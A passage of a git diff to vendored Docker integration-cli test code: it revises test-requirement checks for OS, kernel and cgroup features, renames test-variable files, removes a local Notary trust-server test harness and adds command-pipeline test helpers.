bool { + return func() bool { + if testEnv.OSType != "windows" { + return false + } + version := testEnv.DaemonInfo.KernelVersion + numVersion, _ := strconv.Atoi(strings.Split(version, " ")[1]) + return numVersion >= buildNumber + } +} + +func DaemonIsLinux() bool { + return testEnv.OSType == "linux" +} + +func MinimumAPIVersion(version string) func() bool { + return func() bool { + return versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), version) + } +} + +func OnlyDefaultNetworks() bool { + cli, err := client.NewEnvClient() + if err != nil { + return false + } + networks, err := cli.NetworkList(context.TODO(), types.NetworkListOptions{}) + if err != nil || len(networks) > 0 { + return false + } + return true +} + +// Deprecated: use skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild) +func ExperimentalDaemon() bool { + return testEnv.DaemonInfo.ExperimentalBuild +} + +func IsAmd64() bool { + return os.Getenv("DOCKER_ENGINE_GOARCH") == "amd64" +} + +func NotArm() bool { + return ArchitectureIsNot("arm") +} + +func NotArm64() bool { + return ArchitectureIsNot("arm64") +} + +func NotPpc64le() bool { + return ArchitectureIsNot("ppc64le") +} + +func NotS390X() bool { + return ArchitectureIsNot("s390x") +} + +func SameHostDaemon() bool { + return testEnv.IsLocalDaemon() +} + +func UnixCli() bool { + return isUnixCli +} + +func ExecSupport() bool { + return supportsExec +} + +func Network() bool { + // Set a timeout on the GET at 15s + var timeout = time.Duration(15 * time.Second) + var url = "https://hub.docker.com" + + client := http.Client{ + Timeout: timeout, + } + + resp, err := client.Get(url) + if err != nil && strings.Contains(err.Error(), "use of closed network connection") { + panic(fmt.Sprintf("Timeout for GET request on %s", url)) + } + if resp != nil { + resp.Body.Close() + } + return err == nil +} + +func Apparmor() bool { + if strings.HasPrefix(testEnv.DaemonInfo.OperatingSystem, "SUSE Linux Enterprise Server ") { + return false + } + buf, err := 
ioutil.ReadFile("/sys/module/apparmor/parameters/enabled") + return err == nil && len(buf) > 1 && buf[0] == 'Y' +} + +func Devicemapper() bool { + return strings.HasPrefix(testEnv.DaemonInfo.Driver, "devicemapper") +} + +func IPv6() bool { + cmd := exec.Command("test", "-f", "/proc/net/if_inet6") + return cmd.Run() != nil +} + +func UserNamespaceROMount() bool { + // quick case--userns not enabled in this test run + if os.Getenv("DOCKER_REMAP_ROOT") == "" { + return true + } + if _, _, err := dockerCmdWithError("run", "--rm", "--read-only", "busybox", "date"); err != nil { + return false + } + return true +} + +func NotUserNamespace() bool { + root := os.Getenv("DOCKER_REMAP_ROOT") + return root == "" +} + +func UserNamespaceInKernel() bool { + if _, err := os.Stat("/proc/self/uid_map"); os.IsNotExist(err) { + /* + * This kernel-provided file only exists if user namespaces are + * supported + */ + return false + } + + // We need extra check on redhat based distributions + if f, err := os.Open("/sys/module/user_namespace/parameters/enable"); err == nil { + defer f.Close() + b := make([]byte, 1) + _, _ = f.Read(b) + return string(b) != "N" + } + + return true +} + +func IsPausable() bool { + if testEnv.OSType == "windows" { + return testEnv.DaemonInfo.Isolation == "hyperv" + } + return true +} + +func NotPausable() bool { + if testEnv.OSType == "windows" { + return testEnv.DaemonInfo.Isolation == "process" + } + return false +} + +func IsolationIs(expectedIsolation string) bool { + return testEnv.OSType == "windows" && string(testEnv.DaemonInfo.Isolation) == expectedIsolation +} + +func IsolationIsHyperv() bool { + return IsolationIs("hyperv") +} + +func IsolationIsProcess() bool { + return IsolationIs("process") +} + +// RegistryHosting returns wether the host can host a registry (v2) or not +func RegistryHosting() bool { + // for now registry binary is built only if we're running inside + // container through `make test`. 
Figure that out by testing if + // registry binary is in PATH. + _, err := exec.LookPath(registry.V2binary) + return err == nil +} + +func SwarmInactive() bool { + return testEnv.DaemonInfo.Swarm.LocalNodeState == swarm.LocalNodeStateInactive +} + +func TODOBuildkit() bool { + return os.Getenv("DOCKER_BUILDKIT") == "" +} + +// testRequires checks if the environment satisfies the requirements +// for the test to run or skips the tests. +func testRequires(c requirement.SkipT, requirements ...requirement.Test) { + requirement.Is(c, requirements...) +} diff --git a/vendor/github.com/docker/docker/integration-cli/requirements_unix.go b/vendor/github.com/docker/docker/integration-cli/requirements_unix.go deleted file mode 100644 index ef017d8a76..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/requirements_unix.go +++ /dev/null @@ -1,159 +0,0 @@ -// +build !windows - -package main - -import ( - "bytes" - "io/ioutil" - "os/exec" - "strings" - - "github.com/docker/docker/pkg/parsers/kernel" - "github.com/docker/docker/pkg/sysinfo" -) - -var ( - // SysInfo stores information about which features a kernel supports. 
- SysInfo *sysinfo.SysInfo - cpuCfsPeriod = testRequirement{ - func() bool { - return SysInfo.CPUCfsPeriod - }, - "Test requires an environment that supports cgroup cfs period.", - } - cpuCfsQuota = testRequirement{ - func() bool { - return SysInfo.CPUCfsQuota - }, - "Test requires an environment that supports cgroup cfs quota.", - } - cpuShare = testRequirement{ - func() bool { - return SysInfo.CPUShares - }, - "Test requires an environment that supports cgroup cpu shares.", - } - oomControl = testRequirement{ - func() bool { - return SysInfo.OomKillDisable - }, - "Test requires Oom control enabled.", - } - pidsLimit = testRequirement{ - func() bool { - return SysInfo.PidsLimit - }, - "Test requires pids limit enabled.", - } - kernelMemorySupport = testRequirement{ - func() bool { - return SysInfo.KernelMemory - }, - "Test requires an environment that supports cgroup kernel memory.", - } - memoryLimitSupport = testRequirement{ - func() bool { - return SysInfo.MemoryLimit - }, - "Test requires an environment that supports cgroup memory limit.", - } - memoryReservationSupport = testRequirement{ - func() bool { - return SysInfo.MemoryReservation - }, - "Test requires an environment that supports cgroup memory reservation.", - } - swapMemorySupport = testRequirement{ - func() bool { - return SysInfo.SwapLimit - }, - "Test requires an environment that supports cgroup swap memory limit.", - } - memorySwappinessSupport = testRequirement{ - func() bool { - return SysInfo.MemorySwappiness - }, - "Test requires an environment that supports cgroup memory swappiness.", - } - blkioWeight = testRequirement{ - func() bool { - return SysInfo.BlkioWeight - }, - "Test requires an environment that supports blkio weight.", - } - cgroupCpuset = testRequirement{ - func() bool { - return SysInfo.Cpuset - }, - "Test requires an environment that supports cgroup cpuset.", - } - seccompEnabled = testRequirement{ - func() bool { - return supportsSeccomp && SysInfo.Seccomp - }, - "Test 
requires that seccomp support be enabled in the daemon.", - } - bridgeNfIptables = testRequirement{ - func() bool { - return !SysInfo.BridgeNFCallIPTablesDisabled - }, - "Test requires that bridge-nf-call-iptables support be enabled in the daemon.", - } - bridgeNfIP6tables = testRequirement{ - func() bool { - return !SysInfo.BridgeNFCallIP6TablesDisabled - }, - "Test requires that bridge-nf-call-ip6tables support be enabled in the daemon.", - } - unprivilegedUsernsClone = testRequirement{ - func() bool { - content, err := ioutil.ReadFile("/proc/sys/kernel/unprivileged_userns_clone") - if err == nil && strings.Contains(string(content), "0") { - return false - } - return true - }, - "Test cannot be run with 'sysctl kernel.unprivileged_userns_clone' = 0", - } - ambientCapabilities = testRequirement{ - func() bool { - content, err := ioutil.ReadFile("/proc/self/status") - if err == nil && strings.Contains(string(content), "CapAmb:") { - return true - } - return false - }, - "Test cannot be run without a kernel (4.3+) supporting ambient capabilities", - } - overlayFSSupported = testRequirement{ - func() bool { - cmd := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "cat /proc/filesystems") - out, err := cmd.CombinedOutput() - if err != nil { - return false - } - return bytes.Contains(out, []byte("overlay\n")) - }, - "Test cannot be run without suppport for overlayfs", - } - overlay2Supported = testRequirement{ - func() bool { - if !overlayFSSupported.Condition() { - return false - } - - daemonV, err := kernel.ParseRelease(daemonKernelVersion) - if err != nil { - return false - } - requiredV := kernel.VersionInfo{Kernel: 4} - return kernel.CompareKernelVersion(*daemonV, requiredV) > -1 - - }, - "Test cannot be run without overlay2 support (kernel 4.0+)", - } -) - -func init() { - SysInfo = sysinfo.New(true) -} diff --git a/vendor/github.com/docker/docker/integration-cli/requirements_unix_test.go 
b/vendor/github.com/docker/docker/integration-cli/requirements_unix_test.go new file mode 100644 index 0000000000..7c594f7db4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/requirements_unix_test.go @@ -0,0 +1,117 @@ +// +build !windows + +package main + +import ( + "bytes" + "io/ioutil" + "os/exec" + "strings" + + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/sysinfo" +) + +var ( + // SysInfo stores information about which features a kernel supports. + SysInfo *sysinfo.SysInfo +) + +func cpuCfsPeriod() bool { + return testEnv.DaemonInfo.CPUCfsPeriod +} + +func cpuCfsQuota() bool { + return testEnv.DaemonInfo.CPUCfsQuota +} + +func cpuShare() bool { + return testEnv.DaemonInfo.CPUShares +} + +func oomControl() bool { + return testEnv.DaemonInfo.OomKillDisable +} + +func pidsLimit() bool { + return SysInfo.PidsLimit +} + +func kernelMemorySupport() bool { + return testEnv.DaemonInfo.KernelMemory +} + +func memoryLimitSupport() bool { + return testEnv.DaemonInfo.MemoryLimit +} + +func memoryReservationSupport() bool { + return SysInfo.MemoryReservation +} + +func swapMemorySupport() bool { + return testEnv.DaemonInfo.SwapLimit +} + +func memorySwappinessSupport() bool { + return SameHostDaemon() && SysInfo.MemorySwappiness +} + +func blkioWeight() bool { + return SameHostDaemon() && SysInfo.BlkioWeight +} + +func cgroupCpuset() bool { + return testEnv.DaemonInfo.CPUSet +} + +func seccompEnabled() bool { + return supportsSeccomp && SysInfo.Seccomp +} + +func bridgeNfIptables() bool { + return !SysInfo.BridgeNFCallIPTablesDisabled +} + +func bridgeNfIP6tables() bool { + return !SysInfo.BridgeNFCallIP6TablesDisabled +} + +func unprivilegedUsernsClone() bool { + content, err := ioutil.ReadFile("/proc/sys/kernel/unprivileged_userns_clone") + return err != nil || !strings.Contains(string(content), "0") +} + +func ambientCapabilities() bool { + content, err := ioutil.ReadFile("/proc/self/status") + return err != nil || 
strings.Contains(string(content), "CapAmb:") +} + +func overlayFSSupported() bool { + cmd := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "cat /proc/filesystems") + out, err := cmd.CombinedOutput() + if err != nil { + return false + } + return bytes.Contains(out, []byte("overlay\n")) +} + +func overlay2Supported() bool { + if !overlayFSSupported() { + return false + } + + daemonV, err := kernel.ParseRelease(testEnv.DaemonInfo.KernelVersion) + if err != nil { + return false + } + requiredV := kernel.VersionInfo{Kernel: 4} + return kernel.CompareKernelVersion(*daemonV, requiredV) > -1 + +} + +func init() { + if SameHostDaemon() { + SysInfo = sysinfo.New(true) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_exec.go b/vendor/github.com/docker/docker/integration-cli/test_vars_exec_test.go similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/test_vars_exec.go rename to vendor/github.com/docker/docker/integration-cli/test_vars_exec_test.go diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go b/vendor/github.com/docker/docker/integration-cli/test_vars_noexec_test.go similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go rename to vendor/github.com/docker/docker/integration-cli/test_vars_noexec_test.go diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go b/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp_test.go similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go rename to vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp_test.go diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go b/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp_test.go similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go rename to 
vendor/github.com/docker/docker/integration-cli/test_vars_seccomp_test.go diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars.go b/vendor/github.com/docker/docker/integration-cli/test_vars_test.go similarity index 90% rename from vendor/github.com/docker/docker/integration-cli/test_vars.go rename to vendor/github.com/docker/docker/integration-cli/test_vars_test.go index 97bcddd5f4..82ec58e9e7 100644 --- a/vendor/github.com/docker/docker/integration-cli/test_vars.go +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_test.go @@ -4,7 +4,7 @@ package main // the command is for a sleeping container based on the daemon platform. // The Windows busybox image does not have a `top` command. func sleepCommandForDaemonPlatform() []string { - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { return []string{"sleep", "240"} } return []string{"top"} diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_unix.go b/vendor/github.com/docker/docker/integration-cli/test_vars_unix_test.go similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/test_vars_unix.go rename to vendor/github.com/docker/docker/integration-cli/test_vars_unix_test.go diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_windows.go b/vendor/github.com/docker/docker/integration-cli/test_vars_windows_test.go similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/test_vars_windows.go rename to vendor/github.com/docker/docker/integration-cli/test_vars_windows_test.go diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar b/vendor/github.com/docker/docker/integration-cli/testdata/emptyLayer.tar similarity index 100% rename from vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar rename to vendor/github.com/docker/docker/integration-cli/testdata/emptyLayer.tar diff --git 
a/vendor/github.com/docker/docker/integration-cli/trust_server.go b/vendor/github.com/docker/docker/integration-cli/trust_server.go deleted file mode 100644 index 18876311a1..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/trust_server.go +++ /dev/null @@ -1,344 +0,0 @@ -package main - -import ( - "fmt" - "io/ioutil" - "net" - "net/http" - "os" - "os/exec" - "path/filepath" - "strings" - "time" - - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/go-connections/tlsconfig" - "github.com/go-check/check" -) - -var notaryBinary = "notary" -var notaryServerBinary = "notary-server" - -type keyPair struct { - Public string - Private string -} - -type testNotary struct { - cmd *exec.Cmd - dir string - keys []keyPair -} - -const notaryHost = "localhost:4443" -const notaryURL = "https://" + notaryHost - -func newTestNotary(c *check.C) (*testNotary, error) { - // generate server config - template := `{ - "server": { - "http_addr": "%s", - "tls_key_file": "%s", - "tls_cert_file": "%s" - }, - "trust_service": { - "type": "local", - "hostname": "", - "port": "", - "key_algorithm": "ed25519" - }, - "logging": { - "level": "debug" - }, - "storage": { - "backend": "memory" - } -}` - tmp, err := ioutil.TempDir("", "notary-test-") - if err != nil { - return nil, err - } - confPath := filepath.Join(tmp, "config.json") - config, err := os.Create(confPath) - if err != nil { - return nil, err - } - defer config.Close() - - workingDir, err := os.Getwd() - if err != nil { - return nil, err - } - if _, err := fmt.Fprintf(config, template, notaryHost, filepath.Join(workingDir, "fixtures/notary/localhost.key"), filepath.Join(workingDir, "fixtures/notary/localhost.cert")); err != nil { - os.RemoveAll(tmp) - return nil, err - } - - // generate client config - clientConfPath := filepath.Join(tmp, "client-config.json") - clientConfig, err := os.Create(clientConfPath) - if err != nil { - return nil, err - } - defer 
clientConfig.Close() - - template = `{ - "trust_dir" : "%s", - "remote_server": { - "url": "%s", - "skipTLSVerify": true - } -}` - if _, err = fmt.Fprintf(clientConfig, template, filepath.Join(cliconfig.ConfigDir(), "trust"), notaryURL); err != nil { - os.RemoveAll(tmp) - return nil, err - } - - // load key fixture filenames - var keys []keyPair - for i := 1; i < 5; i++ { - keys = append(keys, keyPair{ - Public: filepath.Join(workingDir, fmt.Sprintf("fixtures/notary/delgkey%v.crt", i)), - Private: filepath.Join(workingDir, fmt.Sprintf("fixtures/notary/delgkey%v.key", i)), - }) - } - - // run notary-server - cmd := exec.Command(notaryServerBinary, "-config", confPath) - if err := cmd.Start(); err != nil { - os.RemoveAll(tmp) - if os.IsNotExist(err) { - c.Skip(err.Error()) - } - return nil, err - } - - testNotary := &testNotary{ - cmd: cmd, - dir: tmp, - keys: keys, - } - - // Wait for notary to be ready to serve requests. - for i := 1; i <= 20; i++ { - if err = testNotary.Ping(); err == nil { - break - } - time.Sleep(10 * time.Millisecond * time.Duration(i*i)) - } - - if err != nil { - c.Fatalf("Timeout waiting for test notary to become available: %s", err) - } - - return testNotary, nil -} - -func (t *testNotary) Ping() error { - tlsConfig := tlsconfig.ClientDefault() - tlsConfig.InsecureSkipVerify = true - client := http.Client{ - Transport: &http.Transport{ - Proxy: http.ProxyFromEnvironment, - Dial: (&net.Dialer{ - Timeout: 30 * time.Second, - KeepAlive: 30 * time.Second, - }).Dial, - TLSHandshakeTimeout: 10 * time.Second, - TLSClientConfig: tlsConfig, - }, - } - resp, err := client.Get(fmt.Sprintf("%s/v2/", notaryURL)) - if err != nil { - return err - } - if resp.StatusCode != http.StatusOK { - return fmt.Errorf("notary ping replied with an unexpected status code %d", resp.StatusCode) - } - return nil -} - -func (t *testNotary) Close() { - t.cmd.Process.Kill() - os.RemoveAll(t.dir) -} - -func (s *DockerTrustSuite) trustedCmd(cmd *exec.Cmd) { - pwd := "12345678" 
- trustCmdEnv(cmd, notaryURL, pwd, pwd) -} - -func (s *DockerTrustSuite) trustedCmdWithServer(cmd *exec.Cmd, server string) { - pwd := "12345678" - trustCmdEnv(cmd, server, pwd, pwd) -} - -func (s *DockerTrustSuite) trustedCmdWithPassphrases(cmd *exec.Cmd, rootPwd, repositoryPwd string) { - trustCmdEnv(cmd, notaryURL, rootPwd, repositoryPwd) -} - -func trustCmdEnv(cmd *exec.Cmd, server, rootPwd, repositoryPwd string) { - env := []string{ - "DOCKER_CONTENT_TRUST=1", - fmt.Sprintf("DOCKER_CONTENT_TRUST_SERVER=%s", server), - fmt.Sprintf("DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE=%s", rootPwd), - fmt.Sprintf("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE=%s", repositoryPwd), - } - cmd.Env = append(os.Environ(), env...) -} - -func (s *DockerTrustSuite) setupTrustedImage(c *check.C, name string) string { - repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, name) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - - if err != nil { - c.Fatalf("Error running trusted push: %s\n%s", err, out) - } - if !strings.Contains(string(out), "Signing and pushing trust metadata") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) - } - - if out, status := dockerCmd(c, "rmi", repoName); status != 0 { - c.Fatalf("Error removing image %q\n%s", repoName, out) - } - - return repoName -} - -func (s *DockerTrustSuite) setupTrustedplugin(c *check.C, source, name string) string { - repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, name) - // tag the image and upload it to the private registry - dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--alias", repoName, source) - - pushCmd := exec.Command(dockerBinary, "plugin", "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - - if err != nil { - c.Fatalf("Error running 
trusted plugin push: %s\n%s", err, out) - } - if !strings.Contains(string(out), "Signing and pushing trust metadata") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) - } - - if out, status := dockerCmd(c, "plugin", "rm", "-f", repoName); status != 0 { - c.Fatalf("Error removing plugin %q\n%s", repoName, out) - } - - return repoName -} - -func notaryClientEnv(cmd *exec.Cmd) { - pwd := "12345678" - env := []string{ - fmt.Sprintf("NOTARY_ROOT_PASSPHRASE=%s", pwd), - fmt.Sprintf("NOTARY_TARGETS_PASSPHRASE=%s", pwd), - fmt.Sprintf("NOTARY_SNAPSHOT_PASSPHRASE=%s", pwd), - fmt.Sprintf("NOTARY_DELEGATION_PASSPHRASE=%s", pwd), - } - cmd.Env = append(os.Environ(), env...) -} - -func (s *DockerTrustSuite) notaryInitRepo(c *check.C, repoName string) { - initCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "init", repoName) - notaryClientEnv(initCmd) - out, _, err := runCommandWithOutput(initCmd) - if err != nil { - c.Fatalf("Error initializing notary repository: %s\n", out) - } -} - -func (s *DockerTrustSuite) notaryCreateDelegation(c *check.C, repoName, role string, pubKey string, paths ...string) { - pathsArg := "--all-paths" - if len(paths) > 0 { - pathsArg = "--paths=" + strings.Join(paths, ",") - } - - delgCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), - "delegation", "add", repoName, role, pubKey, pathsArg) - notaryClientEnv(delgCmd) - out, _, err := runCommandWithOutput(delgCmd) - if err != nil { - c.Fatalf("Error adding %s role to notary repository: %s\n", role, out) - } -} - -func (s *DockerTrustSuite) notaryPublish(c *check.C, repoName string) { - pubCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "publish", repoName) - notaryClientEnv(pubCmd) - out, _, err := runCommandWithOutput(pubCmd) - if err != nil { - c.Fatalf("Error publishing notary repository: %s\n", out) - } -} - -func (s *DockerTrustSuite) notaryImportKey(c *check.C, 
repoName, role string, privKey string) { - impCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "key", - "import", privKey, "-g", repoName, "-r", role) - notaryClientEnv(impCmd) - out, _, err := runCommandWithOutput(impCmd) - if err != nil { - c.Fatalf("Error importing key to notary repository: %s\n", out) - } -} - -func (s *DockerTrustSuite) notaryListTargetsInRole(c *check.C, repoName, role string) map[string]string { - listCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "list", - repoName, "-r", role) - notaryClientEnv(listCmd) - out, _, err := runCommandWithOutput(listCmd) - if err != nil { - c.Fatalf("Error listing targets in notary repository: %s\n", out) - } - - // should look something like: - // NAME DIGEST SIZE (BYTES) ROLE - // ------------------------------------------------------------------------------------------------------ - // latest 24a36bbc059b1345b7e8be0df20f1b23caa3602e85d42fff7ecd9d0bd255de56 1377 targets - - targets := make(map[string]string) - - // no target - lines := strings.Split(strings.TrimSpace(out), "\n") - if len(lines) == 1 && strings.Contains(out, "No targets present in this repository.") { - return targets - } - - // otherwise, there is at least one target - c.Assert(len(lines), checker.GreaterOrEqualThan, 3) - - for _, line := range lines[2:] { - tokens := strings.Fields(line) - c.Assert(tokens, checker.HasLen, 4) - targets[tokens[0]] = tokens[3] - } - - return targets -} - -func (s *DockerTrustSuite) assertTargetInRoles(c *check.C, repoName, target string, roles ...string) { - // check all the roles - for _, role := range roles { - targets := s.notaryListTargetsInRole(c, repoName, role) - roleName, ok := targets[target] - c.Assert(ok, checker.True) - c.Assert(roleName, checker.Equals, role) - } -} - -func (s *DockerTrustSuite) assertTargetNotInRoles(c *check.C, repoName, target string, roles ...string) { - targets := s.notaryListTargetsInRole(c, 
repoName, "targets") - - roleName, ok := targets[target] - if ok { - for _, role := range roles { - c.Assert(roleName, checker.Not(checker.Equals), role) - } - } -} diff --git a/vendor/github.com/docker/docker/integration-cli/utils.go b/vendor/github.com/docker/docker/integration-cli/utils.go deleted file mode 100644 index 87d48e41b0..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/utils.go +++ /dev/null @@ -1,79 +0,0 @@ -package main - -import ( - "io" - "os" - "os/exec" - "time" - - "github.com/docker/docker/pkg/integration" - "github.com/docker/docker/pkg/integration/cmd" -) - -func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) { - if daemonPlatform == "windows" { - return "c:", `\` - } - return "", "/" -} - -// TODO: update code to call cmd.RunCmd directly, and remove this function -func runCommandWithOutput(execCmd *exec.Cmd) (string, int, error) { - result := cmd.RunCmd(transformCmd(execCmd)) - return result.Combined(), result.ExitCode, result.Error -} - -// TODO: update code to call cmd.RunCmd directly, and remove this function -func runCommandWithStdoutStderr(execCmd *exec.Cmd) (string, string, int, error) { - result := cmd.RunCmd(transformCmd(execCmd)) - return result.Stdout(), result.Stderr(), result.ExitCode, result.Error -} - -// TODO: update code to call cmd.RunCmd directly, and remove this function -func runCommand(execCmd *exec.Cmd) (exitCode int, err error) { - result := cmd.RunCmd(transformCmd(execCmd)) - return result.ExitCode, result.Error -} - -// Temporary shim for migrating commands to the new function -func transformCmd(execCmd *exec.Cmd) cmd.Cmd { - return cmd.Cmd{ - Command: execCmd.Args, - Env: execCmd.Env, - Dir: execCmd.Dir, - Stdin: execCmd.Stdin, - Stdout: execCmd.Stdout, - } -} - -func runCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, exitCode int, err error) { - return integration.RunCommandPipelineWithOutput(cmds...) 
-} - -func convertSliceOfStringsToMap(input []string) map[string]struct{} { - return integration.ConvertSliceOfStringsToMap(input) -} - -func compareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error { - return integration.CompareDirectoryEntries(e1, e2) -} - -func listTar(f io.Reader) ([]string, error) { - return integration.ListTar(f) -} - -func randomTmpDirPath(s string, platform string) string { - return integration.RandomTmpDirPath(s, platform) -} - -func consumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) { - return integration.ConsumeWithSpeed(reader, chunkSize, interval, stop) -} - -func parseCgroupPaths(procCgroupData string) map[string]string { - return integration.ParseCgroupPaths(procCgroupData) -} - -func runAtDifferentDate(date time.Time, block func()) { - integration.RunAtDifferentDate(date, block) -} diff --git a/vendor/github.com/docker/docker/integration-cli/utils_test.go b/vendor/github.com/docker/docker/integration-cli/utils_test.go new file mode 100644 index 0000000000..fd083681f2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/utils_test.go @@ -0,0 +1,183 @@ +package main + +import ( + "fmt" + "os" + "os/exec" + "path/filepath" + "strings" + + "github.com/docker/docker/internal/testutil" + "github.com/go-check/check" + "github.com/pkg/errors" + "gotest.tools/icmd" +) + +func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) { + if testEnv.OSType == "windows" { + return "c:", `\` + } + return "", "/" +} + +// TODO: update code to call cmd.RunCmd directly, and remove this function +// Deprecated: use gotest.tools/icmd +func runCommandWithOutput(execCmd *exec.Cmd) (string, int, error) { + result := icmd.RunCmd(transformCmd(execCmd)) + return result.Combined(), result.ExitCode, result.Error +} + +// Temporary shim for migrating commands to the new function +func transformCmd(execCmd *exec.Cmd) icmd.Cmd { + return icmd.Cmd{ + Command: execCmd.Args, + 
Env: execCmd.Env, + Dir: execCmd.Dir, + Stdin: execCmd.Stdin, + Stdout: execCmd.Stdout, + } +} + +// ParseCgroupPaths parses 'procCgroupData', which is output of '/proc//cgroup', and returns +// a map which cgroup name as key and path as value. +func ParseCgroupPaths(procCgroupData string) map[string]string { + cgroupPaths := map[string]string{} + for _, line := range strings.Split(procCgroupData, "\n") { + parts := strings.Split(line, ":") + if len(parts) != 3 { + continue + } + cgroupPaths[parts[1]] = parts[2] + } + return cgroupPaths +} + +// RandomTmpDirPath provides a temporary path with rand string appended. +// does not create or checks if it exists. +func RandomTmpDirPath(s string, platform string) string { + // TODO: why doesn't this use os.TempDir() ? + tmp := "/tmp" + if platform == "windows" { + tmp = os.Getenv("TEMP") + } + path := filepath.Join(tmp, fmt.Sprintf("%s.%s", s, testutil.GenerateRandomAlphaOnlyString(10))) + if platform == "windows" { + return filepath.FromSlash(path) // Using \ + } + return filepath.ToSlash(path) // Using / +} + +// RunCommandPipelineWithOutput runs the array of commands with the output +// of each pipelined with the following (like cmd1 | cmd2 | cmd3 would do). +// It returns the final output, the exitCode different from 0 and the error +// if something bad happened. 
+// Deprecated: use icmd instead +func RunCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, err error) { + if len(cmds) < 2 { + return "", errors.New("pipeline does not have multiple cmds") + } + + // connect stdin of each cmd to stdout pipe of previous cmd + for i, cmd := range cmds { + if i > 0 { + prevCmd := cmds[i-1] + cmd.Stdin, err = prevCmd.StdoutPipe() + + if err != nil { + return "", fmt.Errorf("cannot set stdout pipe for %s: %v", cmd.Path, err) + } + } + } + + // start all cmds except the last + for _, cmd := range cmds[:len(cmds)-1] { + if err = cmd.Start(); err != nil { + return "", fmt.Errorf("starting %s failed with error: %v", cmd.Path, err) + } + } + + defer func() { + var pipeErrMsgs []string + // wait all cmds except the last to release their resources + for _, cmd := range cmds[:len(cmds)-1] { + if pipeErr := cmd.Wait(); pipeErr != nil { + pipeErrMsgs = append(pipeErrMsgs, fmt.Sprintf("command %s failed with error: %v", cmd.Path, pipeErr)) + } + } + if len(pipeErrMsgs) > 0 && err == nil { + err = fmt.Errorf("pipelineError from Wait: %v", strings.Join(pipeErrMsgs, ", ")) + } + }() + + // wait on last cmd + out, err := cmds[len(cmds)-1].CombinedOutput() + return string(out), err +} + +type elementListOptions struct { + element, format string +} + +func existingElements(c *check.C, opts elementListOptions) []string { + var args []string + switch opts.element { + case "container": + args = append(args, "ps", "-a") + case "image": + args = append(args, "images", "-a") + case "network": + args = append(args, "network", "ls") + case "plugin": + args = append(args, "plugin", "ls") + case "volume": + args = append(args, "volume", "ls") + } + if opts.format != "" { + args = append(args, "--format", opts.format) + } + out, _ := dockerCmd(c, args...) 
+ var lines []string + for _, l := range strings.Split(out, "\n") { + if l != "" { + lines = append(lines, l) + } + } + return lines +} + +// ExistingContainerIDs returns a list of currently existing container IDs. +func ExistingContainerIDs(c *check.C) []string { + return existingElements(c, elementListOptions{element: "container", format: "{{.ID}}"}) +} + +// ExistingContainerNames returns a list of existing container names. +func ExistingContainerNames(c *check.C) []string { + return existingElements(c, elementListOptions{element: "container", format: "{{.Names}}"}) +} + +// RemoveLinesForExistingElements removes existing elements from the output of a +// docker command. +// This function takes an output []string and returns a []string. +func RemoveLinesForExistingElements(output, existing []string) []string { + for _, e := range existing { + index := -1 + for i, line := range output { + if strings.Contains(line, e) { + index = i + break + } + } + if index != -1 { + output = append(output[:index], output[index+1:]...) + } + } + return output +} + +// RemoveOutputForExistingElements removes existing elements from the output of +// a docker command. +// This function takes an output string and returns a string. 
